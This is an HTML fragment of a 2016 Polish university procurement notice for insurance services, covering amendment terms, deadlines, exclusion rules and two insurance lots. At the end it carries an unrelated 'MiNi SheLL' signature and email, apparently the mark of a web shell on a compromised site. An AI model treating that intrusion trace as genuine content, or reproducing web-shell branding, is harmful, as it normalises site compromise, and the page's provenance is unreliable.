<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania m. in. następujących zmian w umowie: 1) W przypadku przekształceń podmiotowych po stronie Wykonawcy skutkujących następstwem prawnym, a także w przypadku zmiany adresu, nazwy Wykonawcy lub Zamawiającego, dopuszcza się zmiany w tym zakresie; 2) W przypadku zmiany zakresu wykonywanej działalności (np. dodatkowo rozpoczęta działalność) Zamawiającego - zmiana taka nie będzie powodowała zwiększenia składek; 3) Składka łączna i składki indywidualne określone przez Wykonawcę w ofercie mogą ulec zmniejszeniu jeśli np. zmniejszy się suma ubezpieczenia będąca podstawą wyliczenia składki - np. wskutek likwidacji środka trwałego czy też inwestycji, zbycia środka trwałego, jego wydzierżawienia, wyburzenia, gdy środek trwały przestanie istnieć, itp.). W takim przypadku składki należne w terminach płatności następujących po fakcie zmniejszenia podstawy wyliczenia składki nie będą uiszczane lub będą uiszczane w odpowiednio zmniejszonej wysokości; 4) Przedmiot umowy określony w niniejszej Umowie może ulec zmianie np. wskutek likwidacji środka trwałego czy też inwestycji, zbycia środka trwałego, jego wydzierżawienia, wyburzenia, gdy środek trwały przestanie istnieć, itp.). W takim przypadku składki należne w terminach płatności następujących po fakcie zmiany podstawy wyliczenia składki nie będą uiszczane lub będą uiszczane w odpowiednio zmniejszonej wysokości; 5)	Dopuszcza się zmianę składki ubezpieczeniowej łącznej określonej w § 6 ust. 1 i 2 oraz składek indywidualnych określonych przez Wykonawcę w ofercie, jeśli zmiany te będą korzystne dla Zamawiającego, np. w następujących przypadkach: a) w przypadku zmniejszenia poszczególnych cen jednostkowych (składek) w taryfie Wykonawcy, b) w przypadku wprowadzenia przez Wykonawcę specjalnych rabatów - w taki przypadku wysokość należnych opłat, w terminach płatności następujących po fakcie zmniejszenia podstawy wyliczenia składki, będzie odpowiednio zmniejszona, zgodnie z nowymi, zmniejszonymi cenami jednostkowymi (składkami); 6) w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa, w zakresie mającym wpływ na realizacje umowy, dopuszcza się zmiany umowy pozwalające na dostosowanie jej do obowiązujących przepisów prawa; zmiany takie nie spowodują wzrostu ceny ani zmiany terminu realizacji umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uz.zgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Zielonogórski Biuro Zarządzania Nieruchomościami i Obsługi Uczelni, 65-417 Zielona Góra, ul.Licealna 9, pokój 307, Budynek A-18, w godzinach 7.00 -15.00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2016 godzina 11:00, miejsce: Uniwersytet Zielonogórski, 65-417 Zielona Góra, ul. Licealna 9, bud. A-18, pok. 010 - Kancelaria Ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Jeśli w ofercie Wykonawcy będą znajdowały się dokumenty zawierające wartości przedstawione w walutach obcych podczas oceny takich ofert Zamawiający będzie przeliczał waluty obce na złote (PLN) wg średniego kursu Narodowego Banku Polskiego danej waluty z dnia zamieszczenia ogłoszenia o przedmiotowym zamówieniu w Biuletynie Zamówień Publicznych. 2. Zamawiający wykluczy Wykonawców na podstawie przepisów ustawy, w tym również na mocy art. 24 ust. 2a, tzn.: Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia. 3. Zamawiający zobowiązany jest odrzucić ofertę na podstawie art. 89 ustawy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ubezpieczenie mienia od ognia i innych zdarzeń losowych, od kradzieży z włamaniem i rabunku oraz dewastacji, szyb od stłuczenia oraz ubezpieczenie odpowiedzialności cywilnej ogólnej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubezpieczenie mienia od ognia i innych zdarzeń losowych, od kradzieży z włamaniem i rabunku oraz dewastacji, szyb od stłuczenia oraz ubezpieczenie odpowiedzialności cywilnej ogólnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.52.00-5, 66.51.50.00-3, 66.51.51.00-4, 66.51.54.00-7, 66.51.64.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Fakultatywne warunki ubezpieczenia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ubezpieczenie sprzętu elektronicznego przenośnego Instytutu Budownictwa od wszystkich ryzyk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ubezpieczenie sprzętu elektronicznego przenośnego Instytutu Budownictwa od wszystkich ryzyk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 66.51.52.00-5, 66.51.50.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Fakultatywne warunki ubezpieczenia - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com